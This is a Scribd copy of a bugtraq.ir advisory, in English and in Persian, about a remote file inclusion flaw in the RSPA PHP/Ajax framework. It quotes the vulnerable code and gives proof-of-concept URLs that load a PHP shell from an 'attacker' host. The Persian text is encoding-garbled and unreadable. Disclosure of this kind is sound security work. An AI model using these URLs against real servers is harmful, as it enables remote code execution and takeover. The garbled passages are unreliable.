Scribd Logo
Загрузить

Добро пожаловать в Scribd!

  • 3

    Загружено:

    Kia Taheri
    12 просмотров3 страницы
    Security notes that you should know them.

    Авторское право

    © Attribution Non-Commercial (BY-NC)

    Доступные форматы

    PDF, TXT или читайте онлайн в Scribd

    Этот документ был вам полезен?

    Это неприемлемый материал?

    Пожаловаться на этот документ
    Security notes that you should know them.

    Авторское право:

    Attribution Non-Commercial (BY-NC)
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    12 просмотров3 страницы

    3

    Загружено:

    Kia Taheri
    Security notes that you should know them.

    Авторское право:

    Attribution Non-Commercial (BY-NC)
    Скачайте в формате PDF, TXT или читайте онлайн в Scribd
    Отметить как неприемлемый контент
    из 3

    ‫"ت‬#$% &'() &* +,-‫ز‬#*

    :!"#$%

    &/#$% &)01
    RSPA 2(3% &4 Really Simple PHP and Ajax () ‫ای‬7* 89: ‫ ای‬#* ;<=7% ‫ده‬#@ +ABCD%#4 EF GH#* I% PHP
    #J ‫س‬04 ‫ از‬I<LM7= N%#H &4 GH#* I% 5 ‫ و‬4 ‫ي‬#J &3QB PHP ‫ و‬HTML/Javascript IB‫ا‬C1‫ا‬7R ‫ن‬#9%‫& ا‬4 GH#* I%
    T*‫ا‬C= PHP ‫زد‬#@ I% UJ‫ا‬7R ‫ی‬7V,% +W@ +X79@‫واا‬#: ‫ی‬#J ‫اد‬GF‫ رو‬ZF7[ ‫ور را از‬7@ +W@ .
    GH#* I% I@7V@‫ د‬N*#\ 7F‫ در آدرس ز‬.
    http://rspa.sourceforge.net
    I^)‫_ ا‬%

    RSPA Remote File Inclusion

    (Really Simple PHP and Ajax (RSPA


    RSPA is a component based event driven ajax enabled framework for PHP4 and PHP 5. It is a
    combination of plane PHP class and HTML/Javascript.RSPA allows calling server side PHP
    functions from client javascript events. Visit http://rspa.sourceforge.net

    :Credit
    The information has been provided by Hamid Ebadi
    The original article can be found at : http://www.bugtraq.ir

    http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6

    :Vulnerable Systems
    Version: rspa-2007-03-23

    :Description
    Input passed to the" __IncludeFilePHPClass ", " __ClassPath" and " __class" parameters in
    "rspa/framework/Controller_v5.php" and " rspa/framework/Controller_v4.php " is not properly
    verified before being used to include files. This can be exploited to execute arbitrary PHP
    .code by including files from local or external resources

    read more about file inclusion in http://www.bugtraq.ir/articles

    : Vulnerable Code
    ;("require_once("rspaconf.inc.php

    ;['className = $_REQUEST['__class$
    ;['methordName = $_REQUEST['__methord$

    IncludeFile for PHP Class //


    }(['if ($_REQUEST['__IncludeFilePHPClass
    ;['filename = $_REQUEST['__IncludeFilePHPClass $
    ;(require_once ($filename
    {
    Parms //
    if (isset($_REQUEST['__parameters'])){$parameter =
    {;""=getParms($_REQUEST['__parameters']);}else{$parameter

    ClassFile + ClassPath //
    ;("include ("../components/Form.class.php
    }((["if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath
    ;['filename = $RSPA['class_folder'].$className.$RSPA['class_extension $
    }else {
    ;['filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension$
    {
    ;(require_once($filename

    : POC exploit
    The following URL will cause remote file inclusion

    ?/http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://phpshell.txt
    ?/http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://phpshell.txt
    copyright : http://www.bugtraq.ir #

    RSPA ‫ در‬NF#R +@C`X ‫ی‬7FaX b`@‫آ‬


    (Really Simple PHP and Ajax (RSPA

    PHP ‫ای‬7* 89:‫ ا‬#* ;<=7% ‫ده‬#@ +ABCD%#4 EF GH#* I% () Really Simple PHP and Ajax 2(3% &4 RSPA
    .GH#* c% 5 ‫ و‬4 ‫ی‬#J &3QB
    ‫ور را‬7@ +W@ PHP T*‫ا‬C= IB‫ا‬C1‫ا‬7R ‫ن‬#9%‫& ا‬4 GH#* I% HTML/Javascript ‫ و‬PHP #J ‫س‬04 ‫ ار‬I<LM7= N%#H &4
    . ‫زد‬#@ I% UJ‫ا‬7R ‫ی‬7V,% +W@ +X79@‫واا‬#: ‫ی‬#J ‫اد‬GF‫ رو‬ZF7[ ‫از‬

    . GH#* I% I@7V@‫ د‬N*#\ 7F‫و در آدرس ز‬


    http://rspa.sourceforge.net

    : ‫ت‬#'`dC=
    ‫" در‬class __ " eAfWJ ‫" و‬IncludeFilePHPClass ", " __ClassPath__ " 7V%‫را‬#X ‫ورودی‬
    rspa/framework/Controller_v4.php " ‫" و‬rspa/framework/Controller_v5.php"
    . GBCH IWB I@‫ر‬7* IVLA%‫ظ ا‬#'/ ‫ از‬b@#A% ‫رت‬Ch* NF#R +@C`X ‫ از‬i`X
    I% ‫ور‬7@ ‫رج‬#1 ‫ و‬N1‫ ( از دا‬php ‫ي‬#J G4 ‫وی‬#k) ‫اه‬C3/‫ی د‬#J NF#R ‫ا‬7:‫در *& ا‬#\ ‫ی‬7FaX b`@‫ آ‬lF‫& *& ا‬:C= #* 7-‫ذ‬C(B
    . GH#*
    . G`*#`* http://www.bugtraq.ir ‫ را در‬File inclusion NF#R +@C`X ‫رد‬C% ‫ در‬7V,`* ‫ت‬#n0[‫ ا‬G`B‫ا‬C= I%

    : 7FaX b`@‫ی آ‬#J G4

    ;("require_once("rspaconf.inc.php

    ;['className = $_REQUEST['__class$
    ;['methordName = $_REQUEST['__methord$
    IncludeFile for PHP Class //
    }(['if ($_REQUEST['__IncludeFilePHPClass
    ;['filename = $_REQUEST['__IncludeFilePHPClass $
    ;(require_once ($filename
    {

    Parms //
    if (isset($_REQUEST['__parameters'])){$parameter =
    {;""=getParms($_REQUEST['__parameters']);}else{$parameter

    ClassFile + ClassPath //
    ;("include ("../components/Form.class.php
    }((["if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath
    ;['filename = $RSPA['class_folder'].$className.$RSPA['class_extension $
    }else {
    ;['filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension$
    {
    ;(require_once($filename

    : #n‫ت اد‬#<o‫ای ا‬7* ‫ب‬73% G4

    http://[HOST]/rspa/framework/Controller_v5.php?
    ?/__IncludeFilePHPClass=http://attacker/phpshell.txt
    ?/http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt
    http://www.bugtraq.ir #

    ‫دی‬#<n G`Wk

    Вам также может понравиться